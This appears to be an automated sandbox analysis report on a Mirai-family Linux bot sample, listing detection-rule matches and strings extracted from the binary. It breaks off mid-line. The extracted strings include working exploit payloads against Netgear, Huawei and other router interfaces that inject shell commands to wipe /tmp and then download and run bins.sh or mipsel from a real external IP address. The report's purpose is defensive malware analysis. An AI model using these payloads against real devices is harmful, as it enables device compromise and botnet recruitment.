                  Source: 9459.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
                  Source: 9459.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
                  Source: 9446.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
                  Source: 9446.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
                  Source: Initial samplePotential command found: GET / HTTP/1.1
                  Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://176.97.210.195/bins.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                  Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://176.97.210.195/bins.sh;sh${IFS}/tmp/bins.sh&>r&&tar${IFS}/string.js HTTP/1.0
                  Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://176.97.210.195/bins.sh;chmod+777+bins.sh;sh+bins.sh+b HTTP/1.1
                  Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://176.97.210.195/bins.sh;${IFS}sh${IFS}/var/tmp/bins.sh
                  Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://176.97.210.195/bin.sh;chmod+777+bin.sh;sh+/tmp/bins.sh+varcron
                  Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://176.97.210.195/bins.sh;${IFS}sh${IFS}/var/tmp/bins.shGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://176.97.210.195/bin.sh;chmod+777+bin.sh;sh+/tmp/bins.sh+varcron%d.%d.%d.%dOne waveabcdefghijklmnopqrstuvw012345678one trehadPMMVZA
                  Source: ELF static info symbol of initial sample.symtab present: no
                  Source: Initial sampleString containing 'busybox' found: orf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://176.97.210.195/mipsel && chmod +x mipsel && ./mipsel
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 176.97.210.195 -l /tmp/huawei -r /bins.sh;chmod -x huawei;sh /tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://176.97.210.195/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                  Source: Initial sampleString containing 'busybox' found: OpenAss12345orf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://176.97.210.195/mipsel && chmod +x mipsel && ./mipsel
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 176.97.210.195 -l /tmp/huawei -r /bins.sh;chmod -x huawei;sh /tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /UD/act?1 HTTP/1.1
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://176.97.210.195/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /UD/act?1 HTTP/1.1
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://176.97.210.195/bins.sh && chmod 777 /tmp/bins.sh && sh /tmp/bins.sh`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /HNAP1/ HTTP/1.0
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox MIRAI
                  Source: Initial sampleString containing 'busybox' found: enablesystemshellsh/bin/busybox MIRAI
                  Source: classification engineClassification label: mal100.troj.evad.lin@0/2@0/0

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: /tmp/robinbot_sample2 (PID: 9446)File: /tmp/robinbot_sample2Jump to behavior
                  Source: /tmp/robinbot_sample2 (PID: 9446)Queries kernel information via 'uname': Jump to behavior
                  Source: /usr/share/apport/apport-gtk (PID: 9501)Queries kernel information via 'uname': Jump to behavior
                  Source: /usr/share/apport/apport-gtk (PID: 9533)Queries kernel information via 'uname': Jump to behavior
                  Source: robinbot_sample2, 9446.1.0000556ed814d000.0000556ed8371000.r-x.sdmp, robinbot_sample2, 9457.1.0000556ed814d000.0000556ed8371000.r-x.sdmp, robinbot_sample2, 9459.1.0000556ed814d000.0000556ed8371000.r-x.sdmpBinary or memory string: qemu_opts_set_defaults
                  Source: robinbot_sample2, 9446.1.0000556ed814d000.0000556ed8371000.r-x.sdmp, robinbot_sample2, 9457.1.0000556ed814d000.0000556ed8371000.r-x.sdmp, robinbot_sample2, 9459.1.0000556ed814d000.0000556ed8371000.r-x.sdmpBinary or memory string: qemu_oom_check
                  Source: robinbot_sample2, 9446.1.0000556ed814d000.0000556ed8371000.r-x.sdmp, robinbot_sample2, 9457.1.0000556ed814d000.0000556ed8371000.r-x.sdmp, robinbot_sample2, 9459.1.0000556ed814d000.0000556ed8371000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-ppc/translate.cNIP %08x LR %08x CTR %08x XER %08x CPU#%d
                  Source: robinbot_sample2, 9446.1.0000556ed814d000.0000556ed8371000.r-x.sdmp, robinbot_sample2, 9457.1.0000556ed814d000.0000556ed8371000.r-x.sdmp, robinbot_sample2, 9459.1.0000556ed814d000.0000556ed8371000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-output-visitor.c
                  Source: robinbot_sample2, 9446.1.0000556ed814d000.0000556ed8371000.r-x.sdmp, r